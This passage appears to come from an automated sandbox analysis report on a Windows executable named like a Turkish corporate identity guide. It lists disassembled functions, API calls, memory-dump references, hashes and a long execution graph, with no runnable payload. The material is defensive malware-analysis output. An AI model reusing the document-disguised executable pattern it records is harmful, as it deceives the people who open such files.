                                                                                                                                                                                          • Instruction Fuzzy Hash: 20E0C2335016209BC6215F04ED08B5E776CAF58B32F05447AF8807B26087B81C838FD8
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00405BDB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrlenW.KERNEL32(?,C:\Users\user\Desktop,00402F49,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exe,C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BE1
                                                                                                                                                                                          • CharPrevW.USER32(?,00000000,?,C:\Users\user\Desktop,00402F49,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exe,C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BF1
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000004.00000002.35513376796.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513440436.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513694837.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CharPrevlstrlen
                                                                                                                                                                                          • String ID: C:\Users\user\Desktop
                                                                                                                                                                                          • API String ID: 2709904686-3370423016
                                                                                                                                                                                          • Opcode ID: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
                                                                                                                                                                                          • Instruction ID: aeb767edbde6605fb3f6e877d1e8e55744b908c0e0c9ef55a7edb7ad10a4fca3
                                                                                                                                                                                          • Opcode Fuzzy Hash: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
                                                                                                                                                                                          • Instruction Fuzzy Hash: D9D05EB2414920DAC3126B04DC40D9F73ACEF11300B4A446AE440A61A1D7786C8186AD
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 6F3D10E1 Relevance: 5.1, APIs: 4, Instructions: 104memoryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 6F3D116A
                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 6F3D11C7
                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 6F3D11D9
                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 6F3D1203
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35537090100.000000006F3D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F3D0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000004.00000002.35537038422.000000006F3D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35537142179.000000006F3D4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35537193155.000000006F3D6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_6f3d0000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Global$Free$Alloc
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1780285237-0
                                                                                                                                                                                          • Opcode ID: 8325cbeb03230fef2cb002c15c31db0a7715768238d7bc77469bf5a5473eb782
                                                                                                                                                                                          • Instruction ID: df95256d8af332be5af2164dd070d33f90c3c133c3320a7a04bd21767210746e
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8325cbeb03230fef2cb002c15c31db0a7715768238d7bc77469bf5a5473eb782
                                                                                                                                                                                          • Instruction Fuzzy Hash: FF3193B35002059FFB40AFBCD945A66B7EDFB56321B00462EF844D7254E736E911CBA0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00405D15 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FFA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D25
                                                                                                                                                                                          • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405D3D
                                                                                                                                                                                          • CharNextA.USER32(00000000,?,00000000,00405FFA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D4E
                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000,?,00000000,00405FFA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D57
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000004.00000002.35513376796.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513440436.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513694837.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 190613189-0
                                                                                                                                                                                          • Opcode ID: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                                                                                                                                                          • Instruction ID: cc601e2af81a4130f3690bf6756e9ae730db34a97aa71f580e1783f9e5236296
                                                                                                                                                                                          • Opcode Fuzzy Hash: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3DF0F631200818FFC7129FA4DD049AFBBA8EF06354B2580BAE840F7211D634DE02AF98
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                          Execution Coverage:4.2%
                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                          Signature Coverage:1.3%
                                                                                                                                                                                          Total number of Nodes:1649
                                                                                                                                                                                          Total number of Limit Nodes:31
                                                                                                                                                                                          execution_graph 5803 374d220c 5804 374d221a 5803->5804 5805 374d2215 5803->5805 5809 374d20db 5804->5809 5817 374d22b1 5805->5817 5808 374d2228 5810 374d20e7 5809->5810 5813 374d210b 5810->5813 5816 374d20f6 5810->5816 5821 374d1eec 5810->5821 5812 374d216d 5814 374d1eec 50 API calls 5812->5814 5812->5816 5813->5812 5815 374d1eec 50 API calls 5813->5815 5813->5816 5814->5816 5815->5812 5816->5808 5818 374d22c7 5817->5818 5820 374d22d0 5818->5820 6311 374d2264 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 5818->6311 5820->5804 5822 374d1f2a 5821->5822 5823 374d1ef7 5821->5823 5864 374d2049 5822->5864 5825 374d1f1c 5823->5825 5826 374d1efc 5823->5826 5846 374d1f3f 5825->5846 5828 374d1f01 5826->5828 5829 374d1f12 5826->5829 5832 374d1f06 5828->5832 5833 374d240b 5828->5833 5838 374d23ec 5829->5838 5832->5813 5878 374d53e5 5833->5878 6062 374d3513 5838->6062 5841 374d23f5 5841->5832 5844 374d2408 5844->5832 5845 374d351e 7 API calls 5845->5841 5847 374d1f4b 5846->5847 6080 374d247c 5847->6080 5849 374d1f52 5850 374d1f7c 5849->5850 5851 374d2041 5849->5851 5860 374d1f57 5849->5860 6091 374d23de 5850->6091 6107 374d2639 IsProcessorFeaturePresent 5851->6107 5854 374d2048 5855 374d1f8b 5855->5860 6094 374d22fc RtlInitializeSListHead 5855->6094 5857 374d1f99 6095 374d46c5 5857->6095 5860->5832 5862 374d1fb8 5862->5860 6103 374d4669 5862->6103 5865 374d2055 5864->5865 5866 374d207d 5865->5866 5867 374d20d3 5865->5867 5877 374d205e 5865->5877 6184 374d244c 5866->6184 5869 374d2639 4 API calls 5867->5869 5870 374d20da 5869->5870 5871 374d2082 6193 374d2308 5871->6193 5873 374d2087 6196 374d20c4 5873->6196 5875 374d209f 6199 374d260b 5875->6199 5877->5832 5884 374d5aca 5878->5884 5881 374d351e 6033 374d3820 5881->6033 5883 374d2415 5883->5832 5885 374d2410 5884->5885 5886 374d5ad4 5884->5886 5885->5881 5892 374d5e08 5886->5892 5912 374d5c45 5892->5912 5894 374d5e2f 5895 374d5e3b 5894->5895 5896 374d5e47 TlsGetValue 5894->5896 5918 374d2ada 5895->5918 5896->5895 5898 374d5adb 5898->5885 5899 374d5e5e 5898->5899 5900 374d5c45 5 API calls 5899->5900 5901 374d5e85 5900->5901 5902 374d5ea0 TlsSetValue 5901->5902 5903 374d5e94 5901->5903 5902->5903 5904 374d2ada 5 API calls 5903->5904 5905 374d5aee 5904->5905 5906 374d59b5 5905->5906 5907 374d59c0 5906->5907 5908 374d59d0 5906->5908 5933 374d59d6 5907->5933 5908->5885 5914 374d5c71 5912->5914 5916 374d5c75 5912->5916 5913 374d5c95 5913->5916 5917 374d5ca1 GetProcAddress 5913->5917 5914->5913 5914->5916 5925 374d5ce1 5914->5925 5916->5894 5917->5916 5919 374d2ae5 IsProcessorFeaturePresent 5918->5919 5920 374d2ae3 5918->5920 5922 374d2b58 5919->5922 5920->5898 5932 374d2b1c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 5922->5932 5924 374d2c3b 5924->5898 5926 374d5cf7 5925->5926 5927 374d5d02 LoadLibraryExW 5925->5927 5926->5914 5928 374d5d1f GetLastError 5927->5928 5931 374d5d37 5927->5931 5929 374d5d2a LoadLibraryExW 5928->5929 5928->5931 5929->5931 5930 374d5d4e FreeLibrary 5930->5926 5931->5926 5931->5930 5932->5924 5934 374d59e9 5933->5934 5935 374d59ef 5933->5935 5936 374d571e 20 API calls 5934->5936 5937 374d571e 20 API calls 5935->5937 5936->5935 5938 374d59fb 5937->5938 5939 374d571e 20 API calls 5938->5939 5940 374d5a06 5939->5940 5941 374d571e 20 API calls 5940->5941 5942 374d5a11 5941->5942 5943 374d571e 20 API calls 5942->5943 5944 374d5a1c 5943->5944 5945 374d571e 20 API calls 5944->5945 5946 374d5a27 5945->5946 5947 374d571e 20 API calls 5946->5947 5948 374d5a32 5947->5948 5949 374d571e 20 API calls 5948->5949 5950 374d5a3d 5949->5950 5951 374d571e 20 API calls 5950->5951 5952 374d5a48 5951->5952 5953 374d571e 20 API calls 5952->5953 5954 374d5a56 5953->5954 5965 374d589c 5954->5965 5959 374d571e 5960 374d5729 RtlFreeHeap 5959->5960 5961 374d5752 5959->5961 5960->5961 5962 374d573e 5960->5962 5961->5908 5999 374d6368 5962->5999 5971 374d57a8 5965->5971 5967 374d58c0 5968 374d58ec 5967->5968 5983 374d5809 5968->5983 5970 374d5910 5970->5959 5972 374d57b4 5971->5972 5979 374d5671 RtlEnterCriticalSection 5972->5979 5974 374d57be 5977 374d571e 20 API calls 5974->5977 5978 374d57e8 5974->5978 5976 374d57f5 5976->5967 5977->5978 5980 374d57fd 5978->5980 5979->5974 5981 374d56b9 RtlLeaveCriticalSection 5980->5981 5982 374d5807 5981->5982 5982->5976 5984 374d5815 5983->5984 5991 374d5671 RtlEnterCriticalSection 5984->5991 5986 374d581f 5992 374d5a7f 5986->5992 5988 374d5832 5996 374d5848 5988->5996 5990 374d5840 5990->5970 5991->5986 5993 374d5ab5 5992->5993 5994 374d5a8e 5992->5994 5993->5988 5994->5993 5995 374d7cc2 20 API calls 5994->5995 5995->5993 5997 374d56b9 RtlLeaveCriticalSection 5996->5997 5998 374d5852 5997->5998 5998->5990 6002 374d5b7a GetLastError 5999->6002 6003 374d5b99 6002->6003 6004 374d5b93 6002->6004 6008 374d5bf0 SetLastError 6003->6008 6021 374d637b 6003->6021 6005 374d5e08 11 API calls 6004->6005 6005->6003 6010 374d5744 GetLastError 6008->6010 6009 374d5e5e 11 API calls 6012 374d5bc8 6009->6012 6010->5961 6011 374d571e 17 API calls 6013 374d5bb9 6011->6013 6014 374d5bb3 6012->6014 6015 374d5bcf 6012->6015 6016 374d5be7 SetLastError 6013->6016 6014->6011 6028 374d593c 6015->6028 6016->6010 6019 374d571e 17 API calls 6020 374d5be0 6019->6020 6020->6008 6020->6016 6026 374d6388 6021->6026 6022 374d63c8 6025 374d6368 19 API calls 6022->6025 6023 374d63b3 RtlAllocateHeap 6024 374d5bab 6023->6024 6023->6026 6024->6009 6024->6014 6025->6024 6026->6022 6026->6023 6027 374d474f 7 API calls 6026->6027 6027->6026 6029 374d5914 RtlEnterCriticalSection RtlLeaveCriticalSection 6028->6029 6030 374d5997 6029->6030 6031 374d58c4 20 API calls 6030->6031 6032 374d59ae 6031->6032 6032->6019 6034 374d382d 6033->6034 6038 374d384b 6033->6038 6035 374d383b 6034->6035 6039 374d3b67 6034->6039 6044 374d3ba2 6035->6044 6038->5883 6049 374d3a82 6039->6049 6041 374d3b81 6042 374d3b99 TlsGetValue 6041->6042 6043 374d3b8d 6041->6043 6042->6043 6043->6035 6045 374d3a82 5 API calls 6044->6045 6046 374d3bbc 6045->6046 6047 374d3bcb 6046->6047 6048 374d3bd7 TlsSetValue 6046->6048 6047->6038 6048->6047 6050 374d3aaa 6049->6050 6054 374d3aa6 6049->6054 6050->6054 6055 374d39be 6050->6055 6053 374d3ac4 GetProcAddress 6053->6054 6054->6041 6060 374d39cd 6055->6060 6056 374d3a77 6056->6053 6056->6054 6057 374d39ea LoadLibraryExW 6058 374d3a05 GetLastError 6057->6058 6057->6060 6058->6060 6059 374d3a60 FreeLibrary 6059->6060 6060->6056 6060->6057 6060->6059 6061 374d3a38 LoadLibraryExW 6060->6061 6061->6060 6068 374d3856 6062->6068 6064 374d23f1 6064->5841 6065 374d53da 6064->6065 6066 374d5b7a 20 API calls 6065->6066 6067 374d23fd 6066->6067 6067->5844 6067->5845 6069 374d385f 6068->6069 6070 374d3862 GetLastError 6068->6070 6069->6064 6071 374d3b67 6 API calls 6070->6071 6072 374d3877 6071->6072 6073 374d38dc SetLastError 6072->6073 6074 374d3ba2 6 API calls 6072->6074 6079 374d3896 6072->6079 6073->6064 6075 374d3890 6074->6075 6076 374d38b8 6075->6076 6077 374d3ba2 6 API calls 6075->6077 6075->6079 6078 374d3ba2 6 API calls 6076->6078 6076->6079 6077->6076 6078->6079 6079->6073 6081 374d2485 6080->6081 6111 374d2933 IsProcessorFeaturePresent 6081->6111 6085 374d2496 6086 374d249a 6085->6086 6122 374d53c8 6085->6122 6086->5849 6089 374d24b1 6089->5849 6178 374d24b5 6091->6178 6093 374d23e5 6093->5855 6094->5857 6098 374d46dc 6095->6098 6096 374d2ada 5 API calls 6097 374d1fad 6096->6097 6097->5860 6099 374d23b3 6097->6099 6098->6096 6100 374d23b8 6099->6100 6101 374d2933 IsProcessorFeaturePresent 6100->6101 6102 374d23c1 6100->6102 6101->6102 6102->5862 6104 374d4698 6103->6104 6105 374d2ada 5 API calls 6104->6105 6106 374d46c1 6105->6106 6106->5860 6108 374d264e 6107->6108 6109 374d26f9 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6108->6109 6110 374d2744 6109->6110 6110->5854 6112 374d2491 6111->6112 6113 374d34ea 6112->6113 6114 374d34ef 6113->6114 6133 374d3936 6114->6133 6118 374d3505 6119 374d3510 6118->6119 6147 374d3972 6118->6147 6119->6085 6121 374d34fd 6121->6085 6170 374d7457 6122->6170 6125 374d3529 6126 374d3543 6125->6126 6127 374d3532 6125->6127 6126->6086 6128 374d391b 6 API calls 6127->6128 6129 374d3537 6128->6129 6130 374d3972 RtlDeleteCriticalSection 6129->6130 6131 374d353c 6130->6131 6174 374d3c50 6131->6174 6134 374d393f 6133->6134 6136 374d3968 6134->6136 6137 374d34f9 6134->6137 6151 374d3be0 6134->6151 6138 374d3972 RtlDeleteCriticalSection 6136->6138 6137->6121 6139 374d38e8 6137->6139 6138->6137 6156 374d3af1 6139->6156 6142 374d38fd 6142->6118 6143 374d3ba2 6 API calls 6144 374d390b 6143->6144 6145 374d3918 6144->6145 6161 374d391b 6144->6161 6145->6118 6148 374d399c 6147->6148 6149 374d397d 6147->6149 6148->6121 6150 374d3987 RtlDeleteCriticalSection 6149->6150 6150->6148 6150->6150 6152 374d3a82 5 API calls 6151->6152 6153 374d3bfa 6152->6153 6154 374d3c18 InitializeCriticalSectionAndSpinCount 6153->6154 6155 374d3c03 6153->6155 6154->6155 6155->6134 6157 374d3a82 5 API calls 6156->6157 6158 374d3b0b 6157->6158 6159 374d3b24 TlsAlloc 6158->6159 6160 374d38f2 6158->6160 6160->6142 6160->6143 6162 374d3925 6161->6162 6164 374d392b 6161->6164 6165 374d3b2c 6162->6165 6164->6142 6166 374d3a82 5 API calls 6165->6166 6167 374d3b46 6166->6167 6168 374d3b5e TlsFree 6167->6168 6169 374d3b52 6167->6169 6168->6169 6169->6164 6171 374d7470 6170->6171 6172 374d2ada 5 API calls 6171->6172 6173 374d24a3 6172->6173 6173->6089 6173->6125 6175 374d3c59 6174->6175 6177 374d3c7f 6174->6177 6176 374d3c69 FreeLibrary 6175->6176 6175->6177 6176->6175 6177->6126 6179 374d24c8 6178->6179 6180 374d24c4 6178->6180 6181 374d2639 4 API calls 6179->6181 6183 374d24d5 6179->6183 6180->6093 6182 374d2559 6181->6182 6183->6093 6185 374d2451 6184->6185 6186 374d2455 6185->6186 6187 374d2461 6185->6187 6205 374d527a 6186->6205 6190 374d246e 6187->6190 6208 374d499b 6187->6208 6190->5871 6283 374d34c7 RtlInterlockedFlushSList 6193->6283 6195 374d2312 6195->5873 6285 374d246f 6196->6285 6198 374d20c9 6198->5875 6200 374d2617 6199->6200 6201 374d262d 6200->6201 6304 374d53ed 6200->6304 6201->5877 6204 374d3529 8 API calls 6204->6201 6230 374d5132 6205->6230 6209 374d49a7 6208->6209 6210 374d49bf 6209->6210 6252 374d4af5 GetModuleHandleW 6209->6252 6261 374d5671 RtlEnterCriticalSection 6210->6261 6214 374d4a65 6262 374d4aa5 6214->6262 6218 374d4a3c 6221 374d4a54 6218->6221 6225 374d4669 5 API calls 6218->6225 6219 374d4aae 6273 374dbdc9 6219->6273 6220 374d4a82 6265 374d4ab4 6220->6265 6226 374d4669 5 API calls 6221->6226 6223 374d527a 20 API calls 6223->6218 6225->6221 6226->6214 6227 374d49c7 6227->6214 6227->6218 6227->6223 6233 374d50e1 6230->6233 6232 374d245f 6232->5871 6234 374d50ed 6233->6234 6241 374d5671 RtlEnterCriticalSection 6234->6241 6236 374d50fb 6242 374d515a 6236->6242 6240 374d5119 6240->6232 6241->6236 6245 374d517a 6242->6245 6246 374d5182 6242->6246 6243 374d2ada 5 API calls 6244 374d5108 6243->6244 6248 374d5126 6244->6248 6245->6243 6246->6245 6247 374d571e 20 API calls 6246->6247 6247->6245 6251 374d56b9 RtlLeaveCriticalSection 6248->6251 6250 374d5130 6250->6240 6251->6250 6253 374d49b3 6252->6253 6253->6210 6254 374d4b39 GetModuleHandleExW 6253->6254 6255 374d4b63 GetProcAddress 6254->6255 6259 374d4b78 6254->6259 6255->6259 6256 374d4b8c FreeLibrary 6257 374d4b95 6256->6257 6258 374d2ada 5 API calls 6257->6258 6260 374d4b9f 6258->6260 6259->6256 6259->6257 6260->6210 6261->6227 6276 374d56b9 RtlLeaveCriticalSection 6262->6276 6264 374d4a7e 6264->6219 6264->6220 6277 374d6025 6265->6277 6268 374d4ae2 6271 374d4b39 8 API calls 6268->6271 6269 374d4ac2 GetPEB 6269->6268 6270 374d4ad2 GetCurrentProcess TerminateProcess 6269->6270 6270->6268 6272 374d4aea ExitProcess 6271->6272 6274 374d2ada 5 API calls 6273->6274 6275 374dbdd4 6274->6275 6275->6275 6276->6264 6278 374d604a 6277->6278 6282 374d6040 6277->6282 6279 374d5c45 5 API calls 6278->6279 6279->6282 6280 374d2ada 5 API calls 6281 374d4abe 6280->6281 6281->6268 6281->6269 6282->6280 6284 374d34d7 6283->6284 6284->6195 6290 374d53ff 6285->6290 6288 374d391b 6 API calls 6289 374d354d 6288->6289 6289->6198 6293 374d5c2b 6290->6293 6294 374d5c35 6293->6294 6295 374d2476 6293->6295 6297 374d5db2 6294->6297 6295->6288 6298 374d5c45 5 API calls 6297->6298 6299 374d5dd9 6298->6299 6300 374d5de5 6299->6300 6301 374d5df1 TlsFree 6299->6301 6302 374d2ada 5 API calls 6300->6302 6301->6300 6303 374d5e02 6302->6303 6303->6295 6307 374d74da 6304->6307 6308 374d74f3 6307->6308 6309 374d2ada 5 API calls 6308->6309 6310 374d2625 6309->6310 6310->6204 6311->5820 6496 374d284f 6499 374d2882 6496->6499 6502 374d3550 6499->6502 6501 374d285d 6503 374d355d 6502->6503 6506 374d358a 6502->6506 6504 374d47e5 21 API calls 6503->6504 6503->6506 6505 374d357a 6504->6505 6505->6506 6508 374d544d 6505->6508 6506->6501 6509 374d5468 6508->6509 6510 374d545a 6508->6510 6511 374d6368 20 API calls 6509->6511 6510->6509 6515 374d547f 6510->6515 6512 374d5470 6511->6512 6517 374d62ac 6512->6517 6514 374d547a 6514->6506 6515->6514 6516 374d6368 20 API calls 6515->6516 6516->6512 6520 374d6231 6517->6520 6519 374d62b8 6519->6514 6521 374d5b7a 20 API calls 6520->6521 6522 374d6247 6521->6522 6523 374d62a6 6522->6523 6526 374d6255 6522->6526 6531 374d62bc IsProcessorFeaturePresent 6523->6531 6525 374d62ab 6527 374d6231 26 API calls 6525->6527 6529 374d2ada 5 API calls 6526->6529 6528 374d62b8 6527->6528 6528->6519 6530 374d627c 6529->6530 6530->6519 6532 374d62c7 6531->6532 6535 374d60e2 6532->6535 6536 374d60fe 6535->6536 6537 374d612a IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6536->6537 6538 374d61fb 6537->6538 6539 374d2ada 5 API calls 6538->6539 6540 374d6219 GetCurrentProcess TerminateProcess 6539->6540 6540->6525 6541 374d724e GetProcessHeap 7674 374d8a89 7675 374d6d60 51 API calls 7674->7675 7676 374d8a8e 7675->7676 6542 374d5348 6543 374d3529 8 API calls 6542->6543 6544 374d534f 6543->6544 6545 374d7b48 6555 374d8ebf 6545->6555 6549 374d7b55 6568 374d907c 6549->6568 6552 374d7b7f 6553 374d571e 20 API calls 6552->6553 6554 374d7b8a 6553->6554 6572 374d8ec8 6555->6572 6557 374d7b50 6558 374d8fdc 6557->6558 6559 374d8fe8 6558->6559 6592 374d5671 RtlEnterCriticalSection 6559->6592 6561 374d905e 6606 374d9073 6561->6606 6563 374d8ff3 6563->6561 6565 374d9032 RtlDeleteCriticalSection 6563->6565 6593 374da09c 6563->6593 6564 374d906a 6564->6549 6566 374d571e 20 API calls 6565->6566 6566->6563 6569 374d7b64 RtlDeleteCriticalSection 6568->6569 6570 374d9092 6568->6570 6569->6549 6569->6552 6570->6569 6571 374d571e 20 API calls 6570->6571 6571->6569 6573 374d8ed4 6572->6573 6582 374d5671 RtlEnterCriticalSection 6573->6582 6575 374d8f77 6587 374d8f97 6575->6587 6579 374d8f83 6579->6557 6580 374d8e78 66 API calls 6581 374d8ee3 6580->6581 6581->6575 6581->6580 6583 374d7b94 RtlEnterCriticalSection 6581->6583 6584 374d8f6d 6581->6584 6582->6581 6583->6581 6590 374d7ba8 RtlLeaveCriticalSection 6584->6590 6586 374d8f75 6586->6581 6591 374d56b9 RtlLeaveCriticalSection 6587->6591 6589 374d8f9e 6589->6579 6590->6586 6591->6589 6592->6563 6594 374da0a8 6593->6594 6595 374da0ce 6594->6595 6596 374da0b9 6594->6596 6598 374da0c9 6595->6598 6609 374d7b94 RtlEnterCriticalSection 6595->6609 6597 374d6368 20 API calls 6596->6597 6599 374da0be 6597->6599 6598->6563 6601 374d62ac 26 API calls 6599->6601 6601->6598 6602 374da0ea 6610 374da026 6602->6610 6604 374da0f5 6626 374da112 6604->6626 6954 374d56b9 RtlLeaveCriticalSection 6606->6954 6608 374d907a 6608->6564 6609->6602 6611 374da048 6610->6611 6612 374da033 6610->6612 6617 374da043 6611->6617 6629 374d8e12 6611->6629 6613 374d6368 20 API calls 6612->6613 6614 374da038 6613->6614 6616 374d62ac 26 API calls 6614->6616 6616->6617 6617->6604 6619 374d907c 20 API calls 6620 374da064 6619->6620 6635 374d7a5a 6620->6635 6622 374da06a 6642 374dadce 6622->6642 6625 374d571e 20 API calls 6625->6617 6953 374d7ba8 RtlLeaveCriticalSection 6626->6953 6628 374da11a 6628->6598 6630 374d8e2a 6629->6630 6631 374d8e26 6629->6631 6630->6631 6632 374d7a5a 26 API calls 6630->6632 6631->6619 6633 374d8e4a 6632->6633 6657 374d9a22 6633->6657 6636 374d7a7b 6635->6636 6637 374d7a66 6635->6637 6636->6622 6638 374d6368 20 API calls 6637->6638 6639 374d7a6b 6638->6639 6640 374d62ac 26 API calls 6639->6640 6641 374d7a76 6640->6641 6641->6622 6643 374daddd 6642->6643 6644 374dadf2 6642->6644 6645 374d6355 20 API calls 6643->6645 6646 374dae2d 6644->6646 6651 374dae19 6644->6651 6648 374dade2 6645->6648 6647 374d6355 20 API calls 6646->6647 6649 374dae32 6647->6649 6650 374d6368 20 API calls 6648->6650 6653 374d6368 20 API calls 6649->6653 6654 374da070 6650->6654 6910 374dada6 6651->6910 6655 374dae3a 6653->6655 6654->6617 6654->6625 6656 374d62ac 26 API calls 6655->6656 6656->6654 6658 374d9a2e 6657->6658 6659 374d9a4e 6658->6659 6660 374d9a36 6658->6660 6662 374d9aec 6659->6662 6667 374d9a83 6659->6667 6682 374d6355 6660->6682 6664 374d6355 20 API calls 6662->6664 6666 374d9af1 6664->6666 6665 374d6368 20 API calls 6668 374d9a43 6665->6668 6669 374d6368 20 API calls 6666->6669 6685 374d8c7b RtlEnterCriticalSection 6667->6685 6668->6631 6671 374d9af9 6669->6671 6673 374d62ac 26 API calls 6671->6673 6672 374d9a89 6674 374d9aba 6672->6674 6675 374d9aa5 6672->6675 6673->6668 6686 374d9b0d 6674->6686 6676 374d6368 20 API calls 6675->6676 6678 374d9aaa 6676->6678 6679 374d6355 20 API calls 6678->6679 6680 374d9ab5 6679->6680 6737 374d9ae4 6680->6737 6683 374d5b7a 20 API calls 6682->6683 6684 374d635a 6683->6684 6684->6665 6685->6672 6687 374d9b3b 6686->6687 6688 374d9b34 6686->6688 6689 374d9b3f 6687->6689 6690 374d9b5e 6687->6690 6691 374d2ada 5 API calls 6688->6691 6692 374d6355 20 API calls 6689->6692 6693 374d9baf 6690->6693 6694 374d9b92 6690->6694 6695 374d9d15 6691->6695 6696 374d9b44 6692->6696 6698 374d9bc5 6693->6698 6740 374da00b 6693->6740 6697 374d6355 20 API calls 6694->6697 6695->6680 6699 374d6368 20 API calls 6696->6699 6700 374d9b97 6697->6700 6743 374d96b2 6698->6743 6702 374d9b4b 6699->6702 6704 374d6368 20 API calls 6700->6704 6705 374d62ac 26 API calls 6702->6705 6709 374d9b9f 